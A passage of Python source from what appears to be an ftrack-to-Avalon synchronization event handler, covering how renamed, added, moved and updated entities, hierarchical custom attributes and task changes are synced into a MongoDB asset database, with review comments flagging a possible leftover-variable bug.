        # `True` acts as "collect everything"; when `keys` is passed it
        # becomes the list of keys still waiting to be processed
        not_processed_keys = True
        if keys:
            not_processed_keys = [k for k in keys]
        # Normal custom attributes
        processed_keys = []
        for attr in custom_attrs:
            if not not_processed_keys:
                break
            key = attr["key"]
            if key in processed_keys:
                continue
            if key not in entity["custom_attributes"]:
                continue
            if keys:
                if key not in keys:
                    continue
                else:
                    not_processed_keys.remove(key)
            output[key] = entity["custom_attributes"][key]
            processed_keys.append(key)
        if not not_processed_keys:
            return output
        # Hierarchical cust attrs
        hier_keys = []
        defaults = {}
        for attr in hier_attrs:
            key = attr["key"]
            if keys and key not in keys:
                continue
            hier_keys.append(key)
            defaults[key] = attr["default"]
        hier_values = avalon_sync.get_hierarchical_attributes(
            self.process_session, entity, hier_keys, defaults
        )
        for key, val in hier_values.items():
            if key == CUST_ATTR_ID_KEY:
                continue
            output[key] = val
        return output
    def process_renamed(self):
        """Handle renamed entities (tasks are handled separately).

        Changeable entities are renamed in avalon; unchangeable ones
        (holding published data) are renamed back in Ftrack. Freed old
        names are then re-checked for other synchronizable entities.
        """
        ent_infos = self.ftrack_renamed
        if not ent_infos:
            return
        self.log.debug(
            "Processing renamed entities: {}".format(str(ent_infos))
        )
        changeable_queue = queue.Queue()
        for ftrack_id, ent_info in ent_infos.items():
            entity_type = ent_info["entity_type"]
            if entity_type == "Task":
                continue
            new_name = ent_info["changes"]["name"]["new"]
            old_name = ent_info["changes"]["name"]["old"]
            ent_path = self.get_ent_path(ftrack_id)
            avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
            if not avalon_ent:
                # TODO logging
                self.log.debug((
                    "Entity is not is avalon. Moving to \"add\" process. <{}>"
                ).format(ent_path))
                self.ftrack_added[ftrack_id] = ent_info
                continue
            if new_name == avalon_ent["name"]:
                # TODO logging
                self.log.debug((
                    "Avalon entity already has the same name <{}>"
                ).format(ent_path))
                continue
            mongo_id = avalon_ent["_id"]
            if self.changeability_by_mongo_id[mongo_id]:
                changeable_queue.put((ftrack_id, avalon_ent, new_name))
            else:
                # Unchangeable entity - revert the rename in Ftrack
                ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
                ftrack_ent["name"] = avalon_ent["name"]
                try:
                    self.process_session.commit()
                    # TODO logging
                    # TODO report
                    error_msg = "Entity renamed back"
                    report_msg = (
                        "{}||It is not possible to change"
                        " the name of an entity or it's parents, "
                        " if it already contained published data."
                    ).format(error_msg)
                    self.report_items["info"][report_msg].append(ent_path)
                    self.log.warning("{} <{}>".format(error_msg, ent_path))
                except Exception:
                    self.process_session.rollback()
                    # TODO report
                    # TODO logging
                    error_msg = (
                        "Couldn't rename the entity back to its original name"
                    )
                    report_msg = (
                        "{}||Renamed because it is not possible to"
                        " change the name of an entity or it's parents, "
                        " if it already contained published data."
                    ).format(error_msg)
                    error_traceback = (
                        str(traceback.format_exc()).replace("\n", "<br>")
                    ).replace(" ", " ")
                    item_msg = ent_path + "<br>" + error_traceback
                    self.report_items["warning"][report_msg].append(item_msg)
                    self.log.warning(
                        "{}: \"{}\"".format(error_msg, ent_path),
                        exc_info=True
                    )
        old_names = []
        # Process renaming in Avalon DB
        while not changeable_queue.empty():
            ftrack_id, avalon_ent, new_name = changeable_queue.get()
            mongo_id = avalon_ent["_id"]
            old_name = avalon_ent["name"]
            _entity_type = "asset"
            # NOTE(review): `entity_type` here is the leftover value from
            # the last iteration of the for-loop above, not derived from
            # the queued item - looks like a latent bug; verify whether
            # the queued entity's own type should be checked instead.
            if entity_type == "Project":
                _entity_type = "project"
            passed_regex = avalon_sync.check_regex(
                new_name, _entity_type, schema_patterns=self.regex_schemas
            )
            if not passed_regex:
                self.regex_failed.append(ftrack_id)
                continue
            # if avalon does not have same name then can be changed
            same_name_avalon_ent = self.avalon_ents_by_name.get(new_name)
            if not same_name_avalon_ent:
                old_val = self._avalon_ents_by_name.pop(old_name)
                old_val["name"] = new_name
                self._avalon_ents_by_name[new_name] = old_val
                self.updates[mongo_id] = {"name": new_name}
                self.renamed_in_avalon.append(mongo_id)
                old_names.append(old_name)
                if new_name in old_names:
                    old_names.remove(new_name)
                # TODO logging
                ent_path = self.get_ent_path(ftrack_id)
                self.log.debug(
                    "Name of entity will be changed to \"{}\" <{}>".format(
                        new_name, ent_path
                    )
                )
                continue
            # Check if same name is in changable_queue
            # - it's name may be changed in next iteration
            same_name_ftrack_id = same_name_avalon_ent["data"]["ftrackId"]
            same_is_unprocessed = False
            for item in list(changeable_queue.queue):
                if same_name_ftrack_id == item[0]:
                    same_is_unprocessed = True
                    break
            if same_is_unprocessed:
                # Re-queue and retry after the conflicting entity moves
                changeable_queue.put((ftrack_id, avalon_ent, new_name))
                continue
            self.duplicated.append(ftrack_id)
        if old_names:
            self.check_names_synchronizable(old_names)
        # not_found are not processed since all not found are
        # not found because they are not synchronizable
def process_added(self):
    """Synchronize entities newly created in ftrack into the Avalon DB.

    Steps (in order):
    1. Skip entities already synchronized or tasks.
    2. If an Avalon entity with the same name and parents exists but has
       no ftrack id, re-link it instead of creating a duplicate (and
       refresh every in-memory cache that holds the entity).
    3. Reset the MongoID custom attribute on ftrack side to an empty
       string (committed in one batch).
    4. Create remaining entities in Avalon, parents first, skipping
       names that fail the regex or collide with existing names.
    """
    ent_infos = self.ftrack_added
    if not ent_infos:
        return
    self.log.debug(
        "Processing added entities: {}".format(str(ent_infos))
    )
    cust_attrs, hier_attrs = self.avalon_cust_attrs
    entity_type_conf_ids = {}
    # Skip if already exist in avalon db or tasks entities
    # - happens when entity was created by any sync event/action
    pop_out_ents = []
    for ftrack_id, ent_info in ent_infos.items():
        if self.avalon_ents_by_ftrack_id.get(ftrack_id):
            pop_out_ents.append(ftrack_id)
            self.log.warning(
                "Added entity is already synchronized <{}>".format(
                    self.get_ent_path(ftrack_id)
                )
            )
            continue
        entity_type = ent_info["entity_type"]
        if entity_type == "Task":
            continue
        # Name of the entity as it was created on ftrack side.
        name = (
            ent_info
            .get("changes", {})
            .get("name", {})
            .get("new")
        )
        avalon_ent_by_name = self.avalon_ents_by_name.get(name) or {}
        avalon_ent_by_name_ftrack_id = (
            avalon_ent_by_name
            .get("data", {})
            .get("ftrackId")
        )
        # Existing Avalon entity with the same name but no ftrack link:
        # try to re-link instead of creating a duplicate.
        if avalon_ent_by_name and avalon_ent_by_name_ftrack_id is None:
            ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
            if not ftrack_ent:
                ftrack_ent = self.process_session.query(
                    self.entities_query_by_id.format(
                        self.cur_project["id"], ftrack_id
                    )
                ).one()
                self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
            # "link" is ftrack's path from project root; strip project
            # (first) and the entity itself (last) to get parent names.
            ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
            parents = ent_path_items[1:len(ent_path_items)-1:]
            avalon_ent_parents = (
                avalon_ent_by_name.get("data", {}).get("parents")
            )
            if parents == avalon_ent_parents:
                # Same name, same hierarchy position: re-link in mongo
                # and refresh every in-memory cache holding the entity.
                self.dbcon.update_one({
                    "_id": avalon_ent_by_name["_id"]
                }, {
                    "$set": {
                        "data.ftrackId": ftrack_id,
                        "data.entityType": entity_type
                    }
                })
                avalon_ent_by_name["data"]["ftrackId"] = ftrack_id
                avalon_ent_by_name["data"]["entityType"] = entity_type
                self._avalon_ents_by_ftrack_id[ftrack_id] = (
                    avalon_ent_by_name
                )
                if self._avalon_ents_by_parent_id:
                    found = None
                    for _parent_id_, _entities_ in (
                        self._avalon_ents_by_parent_id.items()
                    ):
                        for _idx_, entity in enumerate(_entities_):
                            if entity["_id"] == avalon_ent_by_name["_id"]:
                                found = (_parent_id_, _idx_)
                                break
                        if found:
                            break
                    if found:
                        _parent_id_, _idx_ = found
                        self._avalon_ents_by_parent_id[_parent_id_][
                            _idx_] = avalon_ent_by_name
                if self._avalon_ents_by_id:
                    self._avalon_ents_by_id[avalon_ent_by_name["_id"]] = (
                        avalon_ent_by_name
                    )
                if self._avalon_ents_by_name:
                    self._avalon_ents_by_name[name] = avalon_ent_by_name
                if self._avalon_ents:
                    found = None
                    project, entities = self._avalon_ents
                    for _idx_, _ent_ in enumerate(entities):
                        if _ent_["_id"] != avalon_ent_by_name["_id"]:
                            continue
                        found = _idx_
                        break
                    if found is not None:
                        entities[found] = avalon_ent_by_name
                        self._avalon_ents = project, entities
                pop_out_ents.append(ftrack_id)
                continue
        # Entity will be created anew; make sure the ftrack custom
        # attribute that stores the mongo id is cleared first.
        mongo_id_configuration_id = self._mongo_id_configuration(
            ent_info,
            cust_attrs,
            hier_attrs,
            entity_type_conf_ids
        )
        if not mongo_id_configuration_id:
            self.log.warning((
                "BUG REPORT: Missing MongoID configuration for `{} < {} >`"
            ).format(entity_type, ent_info["entityType"]))
            continue
        _entity_key = collections.OrderedDict({
            "configuration_id": mongo_id_configuration_id,
            "entity_id": ftrack_id
        })
        self.process_session.recorded_operations.push(
            ftrack_api.operation.UpdateEntityOperation(
                "ContextCustomAttributeValue",
                _entity_key,
                "value",
                ftrack_api.symbol.NOT_SET,
                ""
            )
        )
    try:
        # Commit changes of mongo_id to empty string
        self.process_session.commit()
        self.log.debug("Committing unsetting")
    except Exception:
        self.process_session.rollback()
        # TODO logging
        msg = (
            "Could not set value of Custom attribute, where mongo id"
            " is stored, to empty string. Ftrack ids: \"{}\""
        ).format(", ".join(ent_infos.keys()))
        self.log.warning(msg, exc_info=True)
    for ftrack_id in pop_out_ents:
        ent_infos.pop(ftrack_id)
    # sort by parents length (same as by hierarchy level) so parents
    # are created before their children
    _ent_infos = sorted(
        ent_infos.values(),
        key=(lambda ent_info: len(ent_info.get("parents", [])))
    )
    to_sync_by_id = collections.OrderedDict()
    for ent_info in _ent_infos:
        ft_id = ent_info["entityId"]
        to_sync_by_id[ft_id] = self.ftrack_ents_by_id[ft_id]
    # cache regex success (for tasks)
    for ftrack_id, entity in to_sync_by_id.items():
        if entity.entity_type.lower() == "project":
            raise Exception((
                "Project can't be created with event handler!"
                "This is a bug"
            ))
        parent_id = entity["parent_id"]
        parent_avalon = self.avalon_ents_by_ftrack_id.get(parent_id)
        if not parent_avalon:
            # TODO logging
            self.log.debug((
                "Skipping synchronization of entity"
                " because parent was not found in Avalon DB <{}>"
            ).format(self.get_ent_path(ftrack_id)))
            continue
        is_synchonizable = True
        name = entity["name"]
        passed_regex = avalon_sync.check_regex(
            name, "asset", schema_patterns=self.regex_schemas
        )
        if not passed_regex:
            self.regex_failed.append(ftrack_id)
            is_synchonizable = False
        if name in self.avalon_ents_by_name:
            self.duplicated.append(ftrack_id)
            is_synchonizable = False
        if not is_synchonizable:
            continue
        self.create_entity_in_avalon(entity, parent_avalon)
def process_moved(self):
    """
    Handle entities moved to a different place in the hierarchy.
    (Not tasks - handled separately.)

    For each moved entity: if it is "changeable" (no published data
    below it), update its ``visualParent`` in Avalon; otherwise revert
    the move on ftrack side by restoring the original parent_id.
    """
    if not self.ftrack_moved:
        return
    self.log.debug(
        "Processing moved entities: {}".format(str(self.ftrack_moved))
    )
    # Process top-most entities first (fewest parents).
    ftrack_moved = {k: v for k, v in sorted(
        self.ftrack_moved.items(),
        key=(lambda line: len(
            (line[1].get("data", {}).get("parents") or [])
        ))
    )}
    for ftrack_id, ent_info in ftrack_moved.items():
        avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
        if not avalon_ent:
            continue
        new_parent_id = ent_info["changes"]["parent_id"]["new"]
        old_parent_id = ent_info["changes"]["parent_id"]["old"]
        mongo_id = avalon_ent["_id"]
        if self.changeability_by_mongo_id[mongo_id]:
            # Entity may be moved in Avalon: point it at the new parent.
            par_av_ent = self.avalon_ents_by_ftrack_id.get(new_parent_id)
            if not par_av_ent:
                # TODO logging
                # TODO report
                ent_path_items = [self.cur_project["full_name"]]
                ent_path_items.extend(avalon_ent["data"]["parents"])
                ent_path_items.append(avalon_ent["name"])
                ent_path = "/".join(ent_path_items)
                error_msg = (
                    "New parent of entity is not synchronized to avalon"
                )
                report_msg = (
                    "{}||Parent in Avalon can't be changed. That"
                    " may cause issues. Please fix parent or move entity"
                    " under valid entity."
                ).format(error_msg)
                self.report_items["warning"][report_msg].append(ent_path)
                self.log.warning("{} <{}>".format(error_msg, ent_path))
                continue
            # THIS MUST HAPPEN AFTER CREATING NEW ENTITIES !!!!
            # - because entity may be moved under a newly created one
            if "data" not in self.updates[mongo_id]:
                self.updates[mongo_id]["data"] = {}
            # Project parent is stored as visualParent = None.
            vis_par_id = None
            if par_av_ent["type"].lower() != "project":
                vis_par_id = par_av_ent["_id"]
            self.updates[mongo_id]["data"]["visualParent"] = vis_par_id
            self.moved_in_avalon.append(mongo_id)
            # TODO logging
            ent_path_items = [self.cur_project["full_name"]]
            ent_path_items.extend(par_av_ent["data"]["parents"])
            ent_path_items.append(par_av_ent["name"])
            ent_path_items.append(avalon_ent["name"])
            ent_path = "/".join(ent_path_items)
            self.log.debug((
                "Parent of entity ({}) was changed in avalon <{}>"
            ).format(str(mongo_id), ent_path)
            )
        else:
            # Entity contains published data: move it BACK on ftrack
            # side to the parent currently stored in Avalon.
            avalon_ent = self.avalon_ents_by_id[mongo_id]
            avalon_parent_id = avalon_ent["data"]["visualParent"]
            if avalon_parent_id is None:
                avalon_parent_id = avalon_ent["parent"]
            avalon_parent = self.avalon_ents_by_id[avalon_parent_id]
            parent_id = avalon_parent["data"]["ftrackId"]
            # For cases when parent was deleted at the same time
            if parent_id in self.ftrack_recreated_mapping:
                parent_id = (
                    self.ftrack_recreated_mapping[parent_id]
                )
            ftrack_ent = self.ftrack_ents_by_id.get(ftrack_id)
            if not ftrack_ent:
                ftrack_ent = self.process_session.query(
                    self.entities_query_by_id.format(
                        self.cur_project["id"], ftrack_id
                    )
                ).one()
                self.ftrack_ents_by_id[ftrack_id] = ftrack_ent
            # Already at the right place; nothing to revert.
            if parent_id == ftrack_ent["parent_id"]:
                continue
            ftrack_ent["parent_id"] = parent_id
            try:
                self.process_session.commit()
                # TODO logging
                # TODO report
                msg = "Entity was moved back"
                report_msg = (
                    "{}||Entity can't be moved when"
                    " it or its children contain published data"
                ).format(msg)
                ent_path = self.get_ent_path(ftrack_id)
                self.report_items["info"][report_msg].append(ent_path)
                self.log.warning("{} <{}>".format(msg, ent_path))
            except Exception:
                self.process_session.rollback()
                # TODO logging
                # TODO report
                error_msg = (
                    "Couldn't moved the entity back to its original parent"
                )
                report_msg = (
                    "{}||Moved back because it is not possible to"
                    " move with an entity or it's parents, "
                    " if it already contained published data."
                ).format(error_msg)
                error_traceback = (
                    str(traceback.format_exc()).replace("\n", "<br>")
                ).replace(" ", "&nbsp;")
                item_msg = ent_path + "<br>" + error_traceback
                self.report_items["warning"][report_msg].append(item_msg)
                self.log.warning(
                    "{}: \"{}\"".format(error_msg, ent_path),
                    exc_info=True
                )
def process_updated(self):
    """
    Only custom attributes changes should get here.

    Maps changed (non-hierarchical) custom attributes onto the Avalon
    entity's ``data`` and collects hierarchical-attribute changes into
    ``self.hier_cust_attrs_changes`` for later pull-down processing.
    The project-level "applications" attribute is additionally parsed
    into the project's ``config.apps``.
    """
    if not self.ftrack_updated:
        return
    self.log.debug(
        "Processing updated entities: {}".format(str(self.ftrack_updated))
    )
    ent_infos = self.ftrack_updated
    ftrack_mongo_mapping = {}
    not_found_ids = []
    for ftrack_id, ent_info in ent_infos.items():
        avalon_ent = self.avalon_ents_by_ftrack_id.get(ftrack_id)
        if not avalon_ent:
            not_found_ids.append(ftrack_id)
            continue
        ftrack_mongo_mapping[ftrack_id] = avalon_ent["_id"]
    # Drop entities with no Avalon counterpart.
    for ftrack_id in not_found_ids:
        ent_infos.pop(ftrack_id)
    if not ent_infos:
        return
    cust_attrs, hier_attrs = self.avalon_cust_attrs
    # Index custom attributes: project attrs under "show", task attrs
    # under their object type id; "avalon_*" attrs are internal - skip.
    cust_attrs_by_obj_id = collections.defaultdict(dict)
    for cust_attr in cust_attrs:
        key = cust_attr["key"]
        if key.startswith("avalon_"):
            continue
        ca_ent_type = cust_attr["entity_type"]
        if ca_ent_type == "show":
            cust_attrs_by_obj_id[ca_ent_type][key] = cust_attr
        elif ca_ent_type == "task":
            obj_id = cust_attr["object_type_id"]
            cust_attrs_by_obj_id[obj_id][key] = cust_attr
    hier_attrs_keys = [attr["key"] for attr in hier_attrs]
    for ftrack_id, ent_info in ent_infos.items():
        mongo_id = ftrack_mongo_mapping[ftrack_id]
        entType = ent_info["entityType"]
        ent_path = self.get_ent_path(ftrack_id)
        if entType == "show":
            ent_cust_attrs = cust_attrs_by_obj_id.get("show")
        else:
            obj_type_id = ent_info["objectTypeId"]
            ent_cust_attrs = cust_attrs_by_obj_id.get(obj_type_id)
        # Ftrack's entity_type does not have defined custom attributes
        if ent_cust_attrs is None:
            continue
        for key, values in ent_info["changes"].items():
            # Hierarchical attrs are processed later in bulk.
            if key in hier_attrs_keys:
                self.hier_cust_attrs_changes[key].append(ftrack_id)
                continue
            if key not in ent_cust_attrs:
                continue
            if "data" not in self.updates[mongo_id]:
                self.updates[mongo_id]["data"] = {}
            value = values["new"]
            self.updates[mongo_id]["data"][key] = value
            self.log.debug(
                "Setting data value of \"{}\" to \"{}\" <{}>".format(
                    key, value, ent_path
                )
            )
            if entType != "show" or key != "applications":
                continue
            # Store apps to project't config
            apps_str = ent_info["changes"]["applications"]["new"]
            cust_attr_apps = [app for app in apps_str.split(", ") if app]
            proj_apps, warnings = (
                avalon_sync.get_project_apps(cust_attr_apps)
            )
            if "config" not in self.updates[mongo_id]:
                self.updates[mongo_id]["config"] = {}
            self.updates[mongo_id]["config"]["apps"] = proj_apps
            for msg, items in warnings.items():
                if not msg or not items:
                    continue
                self.report_items["warning"][msg] = items
def process_hier_cleanup(self):
    """Recompute parents/hierarchy and hierarchical custom attributes.

    Runs after moves, renames and hierarchical-attribute changes.
    1. Recomputes ``data.parents`` / ``data.hierarchy`` for affected
       entities (processing shallower entities first so children can
       reuse the parent's freshly computed value).
    2. Re-queries hierarchical custom-attribute values from ftrack and
       pushes non-None values down to all descendants.
    All changes are accumulated in ``self.updates`` and flushed via
    ``self.update_entities()``.
    """
    if (
        not self.moved_in_avalon and
        not self.renamed_in_avalon and
        not self.hier_cust_attrs_changes
    ):
        return
    parent_changes = []
    hier_cust_attrs_ids = []
    hier_cust_attrs_keys = []
    all_keys = False
    # Moves invalidate both parents and ALL hierarchical attr values.
    for mongo_id in self.moved_in_avalon:
        parent_changes.append(mongo_id)
        hier_cust_attrs_ids.append(mongo_id)
        all_keys = True
    for mongo_id in self.renamed_in_avalon:
        if mongo_id not in parent_changes:
            parent_changes.append(mongo_id)
    for key, ftrack_ids in self.hier_cust_attrs_changes.items():
        if key.startswith("avalon_"):
            continue
        for ftrack_id in ftrack_ids:
            avalon_ent = self.avalon_ents_by_ftrack_id[ftrack_id]
            mongo_id = avalon_ent["_id"]
            if mongo_id in hier_cust_attrs_ids:
                continue
            hier_cust_attrs_ids.append(mongo_id)
            if not all_keys and key not in hier_cust_attrs_keys:
                hier_cust_attrs_keys.append(key)
    # Parents preparation ***
    mongo_to_ftrack_parents = {}
    missing_ftrack_ents = {}
    for mongo_id in parent_changes:
        avalon_ent = self.avalon_ents_by_id[mongo_id]
        ftrack_id = avalon_ent["data"]["ftrackId"]
        if ftrack_id not in self.ftrack_ents_by_id:
            missing_ftrack_ents[ftrack_id] = mongo_id
            continue
        ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
        # len(link) == depth in hierarchy; used only for sorting below.
        mongo_to_ftrack_parents[mongo_id] = len(ftrack_ent["link"])
    if missing_ftrack_ents:
        joine_ids = ", ".join(
            ["\"{}\"".format(id) for id in missing_ftrack_ents.keys()]
        )
        entities = self.process_session.query(
            self.entities_query_by_id.format(
                self.cur_project["id"], joine_ids
            )
        ).all()
        for entity in entities:
            ftrack_id = entity["id"]
            self.ftrack_ents_by_id[ftrack_id] = entity
            mongo_id = missing_ftrack_ents[ftrack_id]
            mongo_to_ftrack_parents[mongo_id] = len(entity["link"])
    stored_parents_by_mongo = {}
    # sort by hierarchy level
    mongo_to_ftrack_parents = [k for k, v in sorted(
        mongo_to_ftrack_parents.items(),
        key=(lambda item: item[1])
    )]
    self.log.debug(
        "Updating parents and hieararchy because of name/parenting changes"
    )
    for mongo_id in mongo_to_ftrack_parents:
        avalon_ent = self.avalon_ents_by_id[mongo_id]
        vis_par = avalon_ent["data"]["visualParent"]
        # Reuse parent's already-computed parents list when available.
        if vis_par in stored_parents_by_mongo:
            parents = [par for par in stored_parents_by_mongo[vis_par]]
            if vis_par is not None:
                parent_ent = self.avalon_ents_by_id[vis_par]
                parents.append(parent_ent["name"])
            stored_parents_by_mongo[mongo_id] = parents
            continue
        ftrack_id = avalon_ent["data"]["ftrackId"]
        ftrack_ent = self.ftrack_ents_by_id[ftrack_id]
        # Strip project (first) and the entity itself (last).
        ent_path_items = [ent["name"] for ent in ftrack_ent["link"]]
        parents = ent_path_items[1:len(ent_path_items)-1:]
        stored_parents_by_mongo[mongo_id] = parents
    for mongo_id, parents in stored_parents_by_mongo.items():
        avalon_ent = self.avalon_ents_by_id[mongo_id]
        cur_par = avalon_ent["data"]["parents"]
        if cur_par == parents:
            continue
        hierarchy = ""
        if len(parents) > 0:
            hierarchy = os.path.sep.join(parents)
        if "data" not in self.updates[mongo_id]:
            self.updates[mongo_id]["data"] = {}
        self.updates[mongo_id]["data"]["parents"] = parents
        self.updates[mongo_id]["data"]["hierarchy"] = hierarchy
    # Skip custom attributes if didn't change
    if not hier_cust_attrs_ids:
        # TODO logging
        self.log.debug(
            "Hierarchical attributes were not changed. Skipping"
        )
        self.update_entities()
        return
    cust_attrs, hier_attrs = self.avalon_cust_attrs
    # Hierarchical custom attributes preparation ***
    if all_keys:
        hier_cust_attrs_keys = [
            attr["key"] for attr in hier_attrs if (
                not attr["key"].startswith("avalon_")
            )
        ]
    mongo_ftrack_mapping = {}
    cust_attrs_ftrack_ids = []
    # ftrack_parenting = collections.defaultdict(list)
    entities_dict = collections.defaultdict(dict)
    children_queue = queue.Queue()
    parent_queue = queue.Queue()
    # Seed the traversal with directly affected entities; their values
    # must also propagate down (children_queue) and their ancestors'
    # values must be known (parent_queue).
    for mongo_id in hier_cust_attrs_ids:
        avalon_ent = self.avalon_ents_by_id[mongo_id]
        parent_queue.put(avalon_ent)
        ftrack_id = avalon_ent["data"]["ftrackId"]
        if ftrack_id not in entities_dict:
            entities_dict[ftrack_id] = {
                "children": [],
                "parent_id": None,
                "hier_attrs": {}
            }
        mongo_ftrack_mapping[mongo_id] = ftrack_id
        cust_attrs_ftrack_ids.append(ftrack_id)
        children_ents = self.avalon_ents_by_parent_id.get(mongo_id) or []
        for children_ent in children_ents:
            _ftrack_id = children_ent["data"]["ftrackId"]
            if _ftrack_id in entities_dict:
                continue
            entities_dict[_ftrack_id] = {
                "children": [],
                "parent_id": None,
                "hier_attrs": {}
            }
            # if _ftrack_id not in ftrack_parenting[ftrack_id]:
            #     ftrack_parenting[ftrack_id].append(_ftrack_id)
            entities_dict[_ftrack_id]["parent_id"] = ftrack_id
            if _ftrack_id not in entities_dict[ftrack_id]["children"]:
                entities_dict[ftrack_id]["children"].append(_ftrack_id)
            children_queue.put(children_ent)
    # Breadth-first expansion over all descendants.
    while not children_queue.empty():
        avalon_ent = children_queue.get()
        mongo_id = avalon_ent["_id"]
        ftrack_id = avalon_ent["data"]["ftrackId"]
        if ftrack_id in cust_attrs_ftrack_ids:
            continue
        mongo_ftrack_mapping[mongo_id] = ftrack_id
        cust_attrs_ftrack_ids.append(ftrack_id)
        children_ents = self.avalon_ents_by_parent_id.get(mongo_id) or []
        for children_ent in children_ents:
            _ftrack_id = children_ent["data"]["ftrackId"]
            if _ftrack_id in entities_dict:
                continue
            entities_dict[_ftrack_id] = {
                "children": [],
                "parent_id": None,
                "hier_attrs": {}
            }
            entities_dict[_ftrack_id]["parent_id"] = ftrack_id
            if _ftrack_id not in entities_dict[ftrack_id]["children"]:
                entities_dict[ftrack_id]["children"].append(_ftrack_id)
            children_queue.put(children_ent)
    # Walk up to the project so inherited values can be resolved.
    while not parent_queue.empty():
        avalon_ent = parent_queue.get()
        if avalon_ent["type"].lower() == "project":
            continue
        ftrack_id = avalon_ent["data"]["ftrackId"]
        vis_par = avalon_ent["data"]["visualParent"]
        if vis_par is None:
            vis_par = avalon_ent["parent"]
        parent_ent = self.avalon_ents_by_id[vis_par]
        parent_ftrack_id = parent_ent["data"]["ftrackId"]
        if parent_ftrack_id not in entities_dict:
            entities_dict[parent_ftrack_id] = {
                "children": [],
                "parent_id": None,
                "hier_attrs": {}
            }
        if ftrack_id not in entities_dict[parent_ftrack_id]["children"]:
            entities_dict[parent_ftrack_id]["children"].append(ftrack_id)
        entities_dict[ftrack_id]["parent_id"] = parent_ftrack_id
        if parent_ftrack_id in cust_attrs_ftrack_ids:
            continue
        mongo_ftrack_mapping[vis_par] = parent_ftrack_id
        cust_attrs_ftrack_ids.append(parent_ftrack_id)
        # if ftrack_id not in ftrack_parenting[parent_ftrack_id]:
        #     ftrack_parenting[parent_ftrack_id].append(ftrack_id)
        parent_queue.put(parent_ent)
    # Prepare values to query
    entity_ids_joined = ", ".join([
        "\"{}\"".format(id) for id in cust_attrs_ftrack_ids
    ])
    attributes_joined = ", ".join([
        "\"{}\"".format(name) for name in hier_cust_attrs_keys
    ])
    queries = [{
        "action": "query",
        "expression": (
            "select value, entity_id from CustomAttributeValue "
            "where entity_id in ({}) and configuration.key in ({})"
        ).format(entity_ids_joined, attributes_joined)
    }]
    # NOTE(review): "_call" is a private ftrack_api fallback for older
    # versions without the public "call" - confirm still needed.
    if hasattr(self.process_session, "call"):
        [values] = self.process_session.call(queries)
    else:
        [values] = self.process_session._call(queries)
    ftrack_project_id = self.cur_project["id"]
    # Project level starts from attribute defaults.
    for attr in hier_attrs:
        key = attr["key"]
        if key not in hier_cust_attrs_keys:
            continue
        entities_dict[ftrack_project_id]["hier_attrs"][key] = (
            attr["default"]
        )
    # PREPARE DATA BEFORE THIS
    avalon_hier = []
    for value in values["data"]:
        if value["value"] is None:
            continue
        entity_id = value["entity_id"]
        key = value["configuration"]["key"]
        entities_dict[entity_id]["hier_attrs"][key] = value["value"]
    # Get dictionary with not None hierarchical values to pull to childs
    project_values = {}
    for key, value in (
        entities_dict[ftrack_project_id]["hier_attrs"].items()
    ):
        if value is not None:
            project_values[key] = value
    # NOTE(review): avalon_hier is always empty here, so this loop is
    # dead code (and would KeyError on "avalon_attrs" if it ran).
    for key in avalon_hier:
        value = entities_dict[ftrack_project_id]["avalon_attrs"][key]
        if value is not None:
            project_values[key] = value
    # Push values down the tree; a child's own non-None value wins.
    hier_down_queue = queue.Queue()
    hier_down_queue.put((project_values, ftrack_project_id))
    while not hier_down_queue.empty():
        hier_values, parent_id = hier_down_queue.get()
        for child_id in entities_dict[parent_id]["children"]:
            _hier_values = hier_values.copy()
            for name in hier_cust_attrs_keys:
                value = entities_dict[child_id]["hier_attrs"].get(name)
                if value is not None:
                    _hier_values[name] = value
            entities_dict[child_id]["hier_attrs"].update(_hier_values)
            hier_down_queue.put((_hier_values, child_id))
    ftrack_mongo_mapping = {}
    for mongo_id, ftrack_id in mongo_ftrack_mapping.items():
        ftrack_mongo_mapping[ftrack_id] = mongo_id
    for ftrack_id, data in entities_dict.items():
        mongo_id = ftrack_mongo_mapping[ftrack_id]
        avalon_ent = self.avalon_ents_by_id[mongo_id]
        ent_path = self.get_ent_path(ftrack_id)
        # TODO logging
        self.log.debug(
            "Updating hierarchical attributes <{}>".format(ent_path)
        )
        for key, value in data["hier_attrs"].items():
            if (
                key in avalon_ent["data"] and
                avalon_ent["data"][key] == value
            ):
                continue
            self.log.debug("- {}: {}".format(key, value))
            if "data" not in self.updates[mongo_id]:
                self.updates[mongo_id]["data"] = {}
            self.updates[mongo_id]["data"][key] = value
    self.update_entities()
def process_task_updates(self):
    """
    Pull task information for selected ftrack ids to replace stored
    existing in Avalon.

    Solves problem of changing type (even Status in the future) of
    task without storing ftrack id for task in the DB. (Which doesn't
    bring much advantage currently and it could be troublesome for
    all hosts or plugins (for example Nuke) to collect and store.

    Returns:
        None
    """
    self.log.debug(
        "Processing task changes for parents: {}".format(
            self.modified_tasks_ftrackids
        )
    )
    if not self.modified_tasks_ftrackids:
        return
    joined_ids = ", ".join([
        "\"{}\"".format(ftrack_id)
        for ftrack_id in self.modified_tasks_ftrackids
    ])
    task_entities = self.process_session.query(
        self.task_entities_query_by_parent_id.format(
            self.cur_project["id"], joined_ids
        )
    ).all()
    ftrack_mongo_mapping_found = {}
    not_found_ids = []
    # Make sure all parents have updated tasks, as they may not have any
    tasks_per_ftrack_id = {
        ftrack_id: {}
        for ftrack_id in self.modified_tasks_ftrackids
    }
    # Query all task types at once
    task_types = self.process_session.query(self.task_types_query).all()
    task_types_by_id = {
        task_type["id"]: task_type
        for task_type in task_types
    }
    # prepare all tasks per parentId, eg. Avalon asset record
    for task_entity in task_entities:
        task_type = task_types_by_id[task_entity["type_id"]]
        ftrack_id = task_entity["parent_id"]
        if ftrack_id not in tasks_per_ftrack_id:
            tasks_per_ftrack_id[ftrack_id] = {}
        # Task names failing the regex are excluded entirely.
        passed_regex = avalon_sync.check_regex(
            task_entity["name"], "task",
            schema_patterns=self.regex_schemas
        )
        if not passed_regex:
            self.regex_failed.append(task_entity["id"])
            continue
        tasks_per_ftrack_id[ftrack_id][task_entity["name"]] = {
            "type": task_type["name"]
        }
    # find avalon entity by parentId
    # should be there as create was run first
    for ftrack_id in tasks_per_ftrack_id.keys():
        avalon_entity = self.avalon_ents_by_ftrack_id.get(ftrack_id)
        if not avalon_entity:
            not_found_ids.append(ftrack_id)
